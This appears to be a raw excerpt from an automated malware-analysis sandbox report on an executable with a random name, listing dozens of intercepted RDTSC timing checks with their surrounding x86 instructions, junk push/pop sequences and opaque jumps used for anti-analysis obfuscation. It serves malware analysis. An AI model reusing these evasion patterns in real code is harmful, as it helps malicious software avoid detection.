Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C07E2D second address: C07E4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jmp 00007F2A9129471Fh 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C07E4B second address: C07E4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C0CA77 second address: C0CA7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C0B9A4 second address: C0B9BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F2A913FCE96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007F2A913FCE96h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C0B9BA second address: C0B9C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: BD4E6F second address: BAE4D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov edx, dword ptr [ebp+122D1C9Bh] 0x00000011 lea eax, dword ptr [ebp+1248FC21h] 0x00000017 sub dword ptr [ebp+122D2765h], edi 0x0000001d push eax 0x0000001e jng 00007F2A913FCEABh 0x00000024 push eax 0x00000025 jmp 00007F2A913FCEA3h 0x0000002a pop eax 0x0000002b mov dword ptr [esp], eax 0x0000002e push 00000000h 0x00000030 push edx 0x00000031 call 00007F2A913FCE98h 0x00000036 pop edx 0x00000037 mov dword ptr [esp+04h], edx 0x0000003b add dword ptr [esp+04h], 0000001Ch 0x00000043 inc edx 0x00000044 push edx 0x00000045 ret 0x00000046 pop edx 0x00000047 ret 0x00000048 call dword ptr [ebp+12464D0Eh] 0x0000004e jc 00007F2A913FCEA0h 0x00000054 jmp 00007F2A913FCE9Ah 0x00000059 push eax 0x0000005a push edx 0x0000005b jno 00007F2A913FCE9Eh 0x00000061 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: BD5062 second address: BD5066 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: BD5392 second address: BD53A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A913FCE9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: BD53A6 second address: BD53B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: BD5483 second address: BD549E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A913FCEA0h 0x00000009 popad 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: BD549E second address: BD54BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F2A91294716h 0x0000000a popad 0x0000000b jmp 00007F2A9129471Ah 0x00000010 popad 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push edi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: BD54BD second address: BD54C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: BD54C2 second address: BD550B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A9129471Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F2A91294718h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000018h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 mov edx, 60E64500h 0x00000029 call 00007F2A91294719h 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 jns 00007F2A91294716h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: BD550B second address: BD553E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F2A913FCE96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c jp 00007F2A913FCEA7h 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b je 00007F2A913FCE96h 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: BD553E second address: BD556A instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2A91294718h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jl 00007F2A91294716h 0x00000015 jmp 00007F2A91294724h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: BD57B2 second address: BD57CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A913FCEA5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: BD596E second address: BD5972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: BD5972 second address: BD59A4 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F2A913FCE96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b mov dword ptr [esp], eax 0x0000000e jnc 00007F2A913FCE9Ch 0x00000014 add ch, 00000013h 0x00000017 push 00000004h 0x00000019 or dword ptr [ebp+122D3876h], eax 0x0000001f mov ecx, dword ptr [ebp+122D3A01h] 0x00000025 nop 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: BD59A4 second address: BD59A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: BD59A8 second address: BD59AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: BD59AE second address: BD59C9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jo 00007F2A91294716h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jbe 00007F2A9129471Ch 0x00000015 jc 00007F2A91294716h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: BD6098 second address: BD60D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A913FCE9Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jns 00007F2A913FCEADh 0x00000013 mov eax, dword ptr [eax] 0x00000015 push eax 0x00000016 push edx 0x00000017 jns 00007F2A913FCE9Ch 0x0000001d rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: BD60D7 second address: BD60F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A9129471Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: BD60F1 second address: BD60F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: BD6191 second address: BD619A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: BD619A second address: BD61E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007F2A913FCE98h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 lea eax, dword ptr [ebp+1248FC65h] 0x0000002a jmp 00007F2A913FCE9Eh 0x0000002f nop 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007F2A913FCE9Bh 0x00000037 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: BD61E4 second address: BD61EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: BD61EB second address: BD6261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jnp 00007F2A913FCEA6h 0x0000000e nop 0x0000000f mov dword ptr [ebp+1245759Bh], ebx 0x00000015 lea eax, dword ptr [ebp+1248FC21h] 0x0000001b push 00000000h 0x0000001d push ecx 0x0000001e call 00007F2A913FCE98h 0x00000023 pop ecx 0x00000024 mov dword ptr [esp+04h], ecx 0x00000028 add dword ptr [esp+04h], 0000001Bh 0x00000030 inc ecx 0x00000031 push ecx 0x00000032 ret 0x00000033 pop ecx 0x00000034 ret 0x00000035 mov dword ptr [ebp+122D330Bh], eax 0x0000003b or ecx, 112B1422h 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 je 00007F2A913FCEA9h 0x0000004a jmp 00007F2A913FCEA3h 0x0000004f rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: BD6261 second address: BAF05D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F2A91294727h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007F2A91294718h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 0000001Dh 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 mov cx, ax 0x0000002b call dword ptr [ebp+122D216Eh] 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 pop eax 0x00000037 push edx 0x00000038 pop edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: BAF05D second address: BAF063 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: BAF063 second address: BAF069 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: BAF069 second address: BAF078 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2A913FCE96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C0BC88 second address: C0BC92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F2A91294716h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C0BC92 second address: C0BC98 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C0C3DC second address: C0C3E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C0C3E2 second address: C0C3E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C0C6D0 second address: C0C6D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C15B8E second address: C15B92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C15B92 second address: C15B9C instructions: 0x00000000 rdtsc 0x00000002 jno 00007F2A91294716h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C15D25 second address: C15D2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C15D2D second address: C15D39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F2A91294716h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C15ED0 second address: C15ED6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C15ED6 second address: C15EE0 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F2A91294722h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C15EE0 second address: C15EE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C16484 second address: C16498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jo 00007F2A91294716h 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f pop ecx 0x00000010 push ebx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C16498 second address: C1649E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C1649E second address: C164A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C166F5 second address: C166F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C166F9 second address: C166FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C166FD second address: C16705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C1A51B second address: C1A534 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F2A9129471Fh 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C19E03 second address: C19E21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F2A913FCE96h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007F2A913FCE9Dh 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C19E21 second address: C19E29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C1A10F second address: C1A113 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C1A256 second address: C1A264 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 popad 0x00000007 jc 00007F2A91294716h 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C1C7F9 second address: C1C7FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C1C7FF second address: C1C803 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C1C803 second address: C1C80D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C1C80D second address: C1C811 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C1C811 second address: C1C819 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C1C819 second address: C1C825 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 jno 00007F2A91294716h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: B7CA8B second address: B7CA95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C21B0A second address: C21B11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C21C4E second address: C21C58 instructions: 0x00000000 rdtsc 0x00000002 js 00007F2A913FCE96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C21DE7 second address: C21DFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F2A91294716h 0x0000000a pop esi 0x0000000b pop eax 0x0000000c jo 00007F2A91294741h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C21DFD second address: C21E01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C21E01 second address: C21E07 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C21E07 second address: C21E1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F2A913FCE9Bh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C21F52 second address: C21F58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C26F89 second address: C26F8E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C2633C second address: C26342 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C26342 second address: C26347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C265F9 second address: C26601 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C2673D second address: C26743 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C269BB second address: C269D5 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2A91294716h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 jnc 00007F2A91294716h 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C269D5 second address: C269E6 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F2A913FCE9Ch 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C269E6 second address: C26A09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A91294721h 0x00000009 jne 00007F2A91294716h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C26A09 second address: C26A18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A913FCE9Ah 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C2AF5B second address: C2AF67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F2A9129471Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C2A868 second address: C2A879 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007F2A913FCEBAh 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C30540 second address: C30546 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C30546 second address: C3054A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C3054A second address: C3056F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A91294722h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F2A9129471Ch 0x0000000f jo 00007F2A91294716h 0x00000015 push edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C306B2 second address: C306E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A913FCEA5h 0x00000009 jmp 00007F2A913FCEA8h 0x0000000e push eax 0x0000000f pop eax 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C306E6 second address: C30703 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2A91294727h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\tTGxYWtjG5.exe RDTSC instruction interceptor: First address: C31485 second address: C314A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2A913FCE9Eh 0x00000009 jmp 00007F2A913FCEA0h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
